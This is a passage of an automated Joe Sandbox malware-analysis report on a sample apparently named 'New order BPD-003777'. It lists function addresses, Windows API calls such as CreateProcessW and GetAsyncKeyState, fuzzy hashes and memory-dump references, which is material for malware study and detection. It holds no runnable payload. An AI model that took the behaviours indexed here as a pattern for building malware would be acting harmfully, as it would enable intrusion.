Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 3ccae1c84635d23bb0add8cb74a7ed55420b0c5f68e60e8f589f693ae1bfd2b1
Instruction ID: a0f16c86dfa7a38770df7b90d24ed275861c3fc152e22bb10f42ec59d76efe2d
Opcode Fuzzy Hash: 3ccae1c84635d23bb0add8cb74a7ed55420b0c5f68e60e8f589f693ae1bfd2b1
Instruction Fuzzy Hash: D8E08C70144218BBFB1A0F19DC1AFF93B19EB0ABA1F108116F957A80E1D7B199D0E260

Function 0031A2D7 Relevance: 1.6, APIs: 1, Instructions: 68nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2

NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 0031A38F

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: c22c3056963dda9507de6217f95a45d1cc1652a91ec13b908f9cbe1a75dfba01
Instruction ID: 04f9ec1397cdcc4198a06636bec4bc80ac35369dc09c1bed0c167cbc375314be
Opcode Fuzzy Hash: c22c3056963dda9507de6217f95a45d1cc1652a91ec13b908f9cbe1a75dfba01
Instruction Fuzzy Hash: FA110338205B106AFB2F5B28CC15FFE3658DB49762F248624F9310E5E1C7644DD0D296

Function 00319E74 Relevance: 1.5, APIs: 1, Instructions: 45nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00299944: GetWindowLongW.USER32(?,000000EB), ref: 00299952

NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,002D76B8,?,?,?,?,?,?), ref: 00319EE7

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 77aa35e335ee87b32ed624101eb07b8db810993093d0a9de1036b1925adce0d6
Instruction ID: 1fbd1eb797e3e95febf69fcdbfcff2870d2986b3794d5e330d8b95715b679ced
Opcode Fuzzy Hash: 77aa35e335ee87b32ed624101eb07b8db810993093d0a9de1036b1925adce0d6
Instruction Fuzzy Hash: 3701F731600154AFDF1ADF28CC19BFA3BA5AF8A721F054166F5591B1A1C331ACE0D7B0

Function 00318AAA Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2

Part of subcall function 0029912D: GetCursorPos.USER32(?), ref: 00299141
Part of subcall function 0029912D: ScreenToClient.USER32(00000000,?), ref: 0029915E
Part of subcall function 0029912D: GetAsyncKeyState.USER32(00000001), ref: 00299183
Part of subcall function 0029912D: GetAsyncKeyState.USER32(00000002), ref: 0029919D

NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,002D7818,?,?,?,?,?,00000001,?), ref: 00318AF8

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
String ID:
API String ID: 2356834413-0
Opcode ID: 06f5b090d47c08a219e5fb53621139df7fa2598f692e1f3330b4dbc13527fb39
Instruction ID: 7e692f25a46eeff762624c25c80fcc236dc58c7c1ac7ada25e4d5e8050879c16
Opcode Fuzzy Hash: 06f5b090d47c08a219e5fb53621139df7fa2598f692e1f3330b4dbc13527fb39
Instruction Fuzzy Hash: 88F08230140219ABDF156F19D81AEEE3F65EF047A1F004015F9161A1A1CBB699E0DFE4

Function 00299052 Relevance: 1.5, APIs: 1, Instructions: 27nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2

NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 00299096

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: ec6ea286d7432d4d64c762ecc892e52a4db70cad23eecfc4d8b196268255df37
Instruction ID: 098a4108e5ae3688a5cea86ff24a27a359062aae9e0fc689907112c9bf8b0c4f
Opcode Fuzzy Hash: ec6ea286d7432d4d64c762ecc892e52a4db70cad23eecfc4d8b196268255df37
Instruction Fuzzy Hash: 10F05E306103099BDF198F19D865B763B66FB41361F20811CE8220A2A0C77399E1DBA0

Function 00319380 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 003193C0

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: ce71ebceb169d77abeffa2d98a6049bf81b31ac029001b5aeb3548e3cb5efb3f
Instruction ID: 18350a8633e41b5e266f5d7c637fead32e8fc930ccaf5f315c6c99427ab93991
Opcode Fuzzy Hash: ce71ebceb169d77abeffa2d98a6049bf81b31ac029001b5aeb3548e3cb5efb3f
Instruction Fuzzy Hash: 98F06D31240394AFDB26DF58DC15FC63BA9EB0A360F044409BA25672E1CB717960D7A0

Function 002990A7 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2

NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 002990D5

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 6b29b97b262c2355344745169e87cd5f19f21ec40c213acf0dc97c9fe1359a45
Instruction ID: f828ebeb36343e2765ccc98b75e562ddbc5befb53a6f754a8696199fe7372a81
Opcode Fuzzy Hash: 6b29b97b262c2355344745169e87cd5f19f21ec40c213acf0dc97c9fe1359a45
Instruction Fuzzy Hash: AFE0EC35550304BBDF56AF94DC11F653B2AEB49365F108018FA151A2A1CB33A9A1DB50

Function 003193CB Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,?,?,?,?,002D7723,?,?,?,?,?,?), ref: 003193F6

Part of subcall function 00318172: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00353018,0035305C), ref: 003181BF
Part of subcall function 00318172: CloseHandle.KERNEL32 ref: 003181D1

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: CloseCreateDialogHandleNtdllProc_Process
String ID:
API String ID: 4178364262-0
Opcode ID: ec55bab55380624e38541d67928dfc43c46fd89ba291950cad07172995299584
Instruction ID: 6ad2e968aa08c805dc86df13fbba41ad2999e601282659af64df61bfdc9e7185
Opcode Fuzzy Hash: ec55bab55380624e38541d67928dfc43c46fd89ba291950cad07172995299584
Instruction Fuzzy Hash: ECE04636140208EFCB06AF04DC60EC63B7AFB0C351F014415FA211B2B2CB32A9A0EF50

Function 00298BA4 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2

Part of subcall function 00298BCD: DestroyWindow.USER32(?), ref: 00298C81
Part of subcall function 00298BCD: KillTimer.USER32(00000000,?,?,?,?,00298BBA,00000000,?), ref: 00298D1B

NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?), ref: 00298BC3

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Window$DestroyDialogKillLongNtdllProc_Timer
String ID:
API String ID: 2797419724-0
Opcode ID: 19c4f8db215a49d722f6d6571aae8354aa5bd2b542c1cfe85014e07a0c036020
Instruction ID: 7ac02804b5a485cb7b1f3ef570efc066bdf2e297924cc4db724024f2a5d0e021
Opcode Fuzzy Hash: 19c4f8db215a49d722f6d6571aae8354aa5bd2b542c1cfe85014e07a0c036020
Instruction Fuzzy Hash: 5AD0127419030877EE112B65DC17F893A1D9B057A5F448020FB04791E1CA7264A09958

Function 002A09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(002A09E1,002A03EE), ref: 002A09DA

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0b768650fdddaa0a9ca077ae5b58cd87b2de2f011e7a691903e7b2f8cdbe7503
Instruction ID: bb7aee30c96fddd8a70bf5c65cdd13bd212333bef56387d5f5be93e963410b24
Opcode Fuzzy Hash: 0b768650fdddaa0a9ca077ae5b58cd87b2de2f011e7a691903e7b2f8cdbe7503
Instruction Fuzzy Hash:

Function 00287920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b2a47703f5bf34c9decb1dec61c3c398ef702157621eab7c72d324434a475b4
Instruction ID: 097bbc1a2add88ec9c993bd3a524fc7f0c8fb948218e7c08fa95f123b9c9f2d2
Opcode Fuzzy Hash: 5b2a47703f5bf34c9decb1dec61c3c398ef702157621eab7c72d324434a475b4
Instruction Fuzzy Hash: 0222B174A2461ADFDF14DF64C981BAEB3F6FF44300F244629E816A7291EB35E960CB50

Function 002891C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89bbf2feecc214946d20701bdee27bdfd25208f1419997f8929c759c25a06a99
Instruction ID: c71ec181af76e004bf89cf15d5b3454a0451c0fc6ac7f6abdafabb59ddcba4fd
Opcode Fuzzy Hash: 89bbf2feecc214946d20701bdee27bdfd25208f1419997f8929c759c25a06a99
Instruction Fuzzy Hash: 5B02B3B5A20206EBDF04DF54D981BADB7B5FF44300F158169E816DB290EB71AA70CF91

Function 002A1C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: a021f476301b7cd1d32aba837a4fcc4891bfaea9bc15647b237ac335b587bd91
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 469157725280A34BDB2D4A3E857407EFFE15A933B1B1A079ED4F2CA1C5FE149974D620

Function 002A1F32 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: b6e3407c6a68a4a09d6b8736a42253b5a18c79cec20e2ef11ddbfb45016f48bb
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: CD9176722291E38FDB294A3D847403EFFE15A933B171A079DD4F6CA5C6EE248578D620

Function 002A19B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: afc3d3b883cee40d6e979ce3d2468ade218483154909fd43f5f89b2daf6217e5
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 7F9143722290A34BDB2D4A7A857403EFFE15A933B6B1A079ED4F2CA1C1FD248574D620

Function 002A7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0841a474fb337021933413970f28e77f3ed936ee0a9528d768075c0e8419130
Instruction ID: 57eded7cf16bb526e3b369c33af9a7528c2c66c17c8a6356af574b9ac6e0a8d3
Opcode Fuzzy Hash: a0841a474fb337021933413970f28e77f3ed936ee0a9528d768075c0e8419130
Instruction Fuzzy Hash: 91617BB123870767DA349D288C95BBF6398DF43708F140D1AE942CB282DE519E72876D

Function 002A1706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 58e44764a76a31c05ea278e15ce80e4add674b5bee60b39ec904ded235815a26
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 048166725290A34FEB6D4A39853443EFFE15A933B1B1A079DD4F2CA1C1EE14C974D620

Function 0029D064 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e684e302b6469fc6ed3f5f921c42a992a4172c5864eb2632330e7fd686315bef
Instruction ID: 54c4bfee5c8acd4d3cdc245403c8b00a01ac65bc8023b8d5d6d28e25b8985c61
Opcode Fuzzy Hash: e684e302b6469fc6ed3f5f921c42a992a4172c5864eb2632330e7fd686315bef
Instruction Fuzzy Hash: A9413BEA84EED15FD3439B3868AD2447FB0ED6652930986CFD0C09628BE3994009CB4A

Function 0146E778 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1778371104.000000000146B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0146B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_146b000_New order BPD-003777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: cb285efb7e4a653a302a210aed0dc7e7ed974e07b4cecf8b0eb2cd3fa9550338
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: C241D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80

Function 0146E668 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

